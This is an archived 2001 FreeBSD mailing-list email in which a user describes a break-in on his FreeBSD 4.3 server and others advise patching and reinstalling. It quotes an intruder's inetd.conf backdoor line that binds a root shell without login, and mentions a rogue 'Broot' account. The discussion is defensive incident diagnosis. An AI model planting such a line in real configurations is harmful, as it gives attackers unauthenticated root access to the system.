From owner-freebsd-questions Thu Oct 18 13:43: 4 2001 Delivered-To: freebsd-questions@freebsd.org Received: from 4evermail.com (equinox.4evermail.com [204.92.209.4]) by hub.freebsd.org (Postfix) with SMTP id 9B25637B403 for ; Thu, 18 Oct 2001 13:42:56 -0700 (PDT) Received: (qmail 71784 invoked from network); 18 Oct 2001 20:44:02 -0000 Received: from equinox.4evermail.com (HELO mail.4evermail.com) (nobody@204.92.209.4) by equinox.4evermail.com with SMTP; 18 Oct 2001 20:44:02 -0000 From: jslivko@4evermail.com To: Cc: freebsd-questions@freebsd.org Subject: Re: I got hacked, I think Date: Thu, 18 Oct 2001 16:44:02 +0000 X-Mailer: Null Webmail / 0.5.9 Message-Id: <20011018204256.9B25637B403@hub.freebsd.org> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Not to mention there is a new release out, 4.4 :) -- Jonathan --- Kent Stewart wrote: > > > Tomek wrote: > > > > I found out more info. > > > > -rw-r--r-- 1 Broot wheel 54 Sep 26 10:24 /inetd.conf > > -rw-r--r-- 1 Broot wheel 85857 Sep 26 21:38 /sudo- 1.6.3.7_1.tgz > > -rw------- 1 Broot wheel 4869 Sep 26 10:25 /etc/inetd.conf > > > > Checking the bizarre /inetd.conf is shocking: > > eklogin stream tcp nowait root /bin/sh sh -i > > > > I take it that "sh" would not even request a login or anything if called > > directly from inetd.conf, would it? I am sitting here, he is STILL > > pinging me and watching the system (even tried to ftp again a few > > minutes ago), and for the life of me I can't figure out where it all > > began... who did he even login in the first time, maybe it was some > > buffer overflow or something.... yuck. > > It began because you were using 4.3-release and you probably didn't fix > the security problems. There were several buffer overflow problems for > daemons that have been published for 4.3-r. The only solution in case of > a hacked has been to do a wipe and reinstall. > > Kent > > > > > TY for all your help guys, you are all wonderful! I will leave you in > > peace now (I hope). I still dont know about Broot though... > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-questions" in the body of the message > > -- > Kent Stewart > Richland, WA > http://users.owt.com/kstewart > > Carl Sagan quote on Seti@home > http://setiathome.ssl.berkeley.edu/pale_blue_dot.html > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message